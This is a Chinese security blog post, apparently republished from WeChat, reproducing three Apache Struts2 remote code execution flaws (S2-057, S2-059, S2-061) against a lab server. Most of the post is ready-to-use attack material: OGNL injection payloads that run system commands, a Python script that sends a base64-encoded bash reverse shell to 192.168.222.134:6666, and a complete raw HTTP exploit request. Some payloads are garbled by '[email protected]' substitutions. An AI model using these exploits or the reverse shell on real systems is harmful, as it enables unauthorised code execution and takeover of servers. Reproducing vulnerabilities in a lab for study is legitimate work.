Struts2 远程代码执行漏洞复现（附Struts2漏洞检测工具）

Struts2 远程代码执行漏洞复现（附Struts2漏洞检测工具）
0x00 Struts2 简介Struts2 是 Apache 软件组织推出的一个相当强大的 Java Web 开源框架，本质上相当于一个 servlet。Struts2 基于 MVC 架构，框架结构 2022-12-27 08:32:26 Author: 菜鸟学信安(查看原文) 阅读量:40 收藏

0x00 Struts2 简介

Struts2 是 Apache 软件组织推出的一个相当强大的 Java Web 开源框架，本质上相当于一个 servlet。Struts2 基于 MVC 架构，框架结构清晰。通常作为控制器（Controller）来建立模型与视图的数据交互，用于创建企业级 Java web 应用程序。该框架多版本存在远程代码执行，

0x01 Struts2 (CVE-2018-11776)

Struts2 S2-057


payload：/struts2-showcase/$%7B233*233%7D/actionChain1.action

验证漏洞存在：


paylaod：ls：查看目录下文件，paylaod需要进行url编码${(#[email protected]@DEFAULT_MEMBER_ACCESS).(#ct=#request['struts.valueStack'].context).(#cr=#ct['com.opensymphony.xwork2.ActionContext.container']).(#ou=#cr.getInstance(@[email protected])).(#ou.getExcludedPackageNames().clear()).(#ou.getExcludedClasses().clear()).(#ct.setMemberAccess(#dm)).(#[email protected]@getRuntime().exec('id')).(@[email protected](#a.getInputStream()))}

0x02 Struts2 (CVE-2019-0230)

Struts2 S2-059

漏洞验证paylaod：/?id=%25{2*5}

反弹shell：paylaod：使用python3环境，运行前查看环境执行是否正常


反弹paylaod：bash -i >& /dev/tcp/192.168.222.134/6666 0>&1需要base64加密放入下paylaodimport requestsurl = "http://192.168.222.134:8080"data1 = {    "id": "%{(#context=#attr['struts.valueStack'].context).(#container=#context['com.opensymphony.xwork2.ActionContext.container']).(#ognlUtil=#container.getInstance(@[email protected])).(#ognlUtil.setExcludedClasses('')).(#ognlUtil.setExcludedPackageNames(''))}"}data2 = {    "id": "%{(#context=#attr['struts.valueStack'].context).(#context.setMemberAccess(@[email protected]_MEMBER_ACCESS)).(@[email protected]().exec('bash -c {echo,YmFzaCAtaSA+JiAvZGV2L3RjcC8xOTIuMTY4LjIyMi4xMzQvNjY2NiAwPiYx}|{base64,-d}|{bash,-i}'))}"}res1 = requests.post(url, data=data1)res2 = requests.post(url, data=data2)print(123)

执行脚本

shell接收成功：

0x03 Struts2 (CVE-2020-17530)

Struts2 S2-061


POC：post请求：POST / HTTP/1.1Host: 192.168.222.134:8080Cache-Control: max-age=0Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9Accept-Encoding: gzip, deflateAccept-Language: zh-CN,zh;q=0.9Cookie: JSESSIONID=node016yd6hhrzkka19x0sws5e7i9g1.node0If-None-Match: W/"187-1504645830000"If-Modified-Since: Tue, 05 Sep 2017 21:10:30 GMTContent-Type: multipart/form-data; boundary=----WebKitFormBoundaryl7d1B1aGsV2wcZwFConnection: closeContent-Length: 829
------WebKitFormBoundaryl7d1B1aGsV2wcZwFContent-Disposition: form-data; name="id"
%{(#instancemanager=#application["org.apache.tomcat.InstanceManager"]).(#stack=#attr["com.opensymphony.xwork2.util.ValueStack.ValueStack"]).(#bean=#instancemanager.newInstance("org.apache.commons.collections.BeanMap")).(#bean.setBean(#stack)).(#context=#bean.get("context")).(#bean.setBean(#context)).(#macc=#bean.get("memberAccess")).(#bean.setBean(#macc)).(#emptyset=#instancemanager.newInstance("java.util.HashSet")).(#bean.put("excludedClasses",#emptyset)).(#bean.put("excludedPackageNames",#emptyset)).(#arglist=#instancemanager.newInstance("java.util.ArrayList")).(#arglist.add("id")).(#execute=#instancemanager.newInstance("freemarker.template.utility.Execute")).(#execute.exec(#arglist))}------WebKitFormBoundaryl7d1B1aGsV2wcZwF--

0x04 strust2 命令执行检测工具

github：https://github.com/HatBoy/Struts2-Scan
现支持部分序号的st2检测：s2-053之前，测试过程还是出现了很多问题，实战中建议使用单独的对应exp检测

文章作者: 告白

文章链接: http://www.kxsy.work/

关注公众号后台回复数字 1126 获取应急响应实战笔记，1127 - ctf工具集合，1230 - 内网工具，3924 - 弱口令爆破工具。

文章来源: http://mp.weixin.qq.com/s?__biz=MzU2NzY5MzI5Ng==&mid=2247494249&idx=1&sn=f702ecde9b47dcbe76118348c055805e&chksm=fc9bf0f6cbec79e0114a746d7cb983a616595213ab9527ec2dc6c48c7240343f8edb745544b8#rd
如有侵权请联系:admin#unsafe.sh